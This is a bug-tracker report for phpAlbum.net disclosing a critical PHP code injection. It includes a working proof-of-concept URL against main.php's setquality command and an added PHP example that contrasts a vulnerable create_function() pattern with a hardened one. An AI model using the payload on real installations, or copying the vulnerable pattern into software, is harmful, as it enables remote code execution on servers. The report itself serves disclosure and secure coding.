PHP code injection attack

Project: phpAlbum.net
Version: 0.4.1-14_fix05
Component: Code
Category: bug
Priority: critical
Assigned: patrik
Status: in work
Description

You can execute arbitrary PHP commands by passing main.php specially crafted parameters. For example,

main.php?cmd=setquality&var1=1'.phpinfo().'

will result in a "create_function()" call that will execute the phpinfo() command.
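The mechanism behind the report, as an added illustration that is not phpAlbum's own code (the page does not show the project's setquality handler; the function names, the string layout of the create_function() body and the quality range 1..100 are all assumptions). The unsafe pattern splices the request parameter into PHP source text that create_function() then compiles, so a single quote in var1 closes the string literal and everything after it is evaluated as PHP; the hardened variant validates the value as an integer and never compiles request data.

```php
<?php
// Added example, not code from phpAlbum.net. Illustrates how concatenating an
// unvalidated GET parameter into a create_function() body yields code injection,
// and how to handle the same input safely. Names and body layout are assumptions.

// Vulnerable pattern (hypothetical): var1 is spliced into source text.
// With var1 = 1'.phpinfo().'  the compiled body is
//     return '1'.phpinfo().'';
// so phpinfo() runs as soon as the generated function is called.
function setquality_vulnerable(string $var1): string
{
    $body = "return '" . $var1 . "';";        // attacker controls part of the source
    $fn = create_function('', $body);         // deprecated in PHP 7.2, removed in 8.0
    return $fn();
}

// Hardened pattern: treat the parameter as data, check it is an integer in range,
// and never hand request input to create_function()/eval().
function setquality_safe(string $var1): int
{
    if (!ctype_digit($var1)) {
        throw new InvalidArgumentException('quality must be a positive integer');
    }
    $q = (int) $var1;
    if ($q < 1 || $q > 100) {                 // assumed valid range for a JPEG quality
        throw new InvalidArgumentException('quality out of range');
    }
    return $q;
}

// Demonstration. A harmless payload with the same shape as the reported one is used
// so the injected expression is visible in the output without dumping phpinfo().
$payload = "1'.(2+3).'";

if (function_exists('create_function')) {
    // Prints "15": the literal '1' was closed, (2+3) was evaluated and concatenated.
    echo "vulnerable: ", setquality_vulnerable($payload), "\n";
} else {
    echo "vulnerable: create_function() not available on this PHP version\n";
}

echo "safe: ", setquality_safe('85'), "\n";   // 85
try {
    setquality_safe($payload);                // rejected: contains non-digits
} catch (InvalidArgumentException $e) {
    echo "safe: rejected (", $e->getMessage(), ")\n";
}
```

Escaping the quote (addslashes() and the like) is not a fix here: the root problem is compiling request data at all, so the generated function should be replaced with ordinary code that takes the validated integer as a variable.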

Updates

#1 submitted by patrik on Thu, 2009-07-16 20:38
Status: new » in work

Thanks for posting! This is by far the most serious bug I ever produced ...
Do you have more examples?

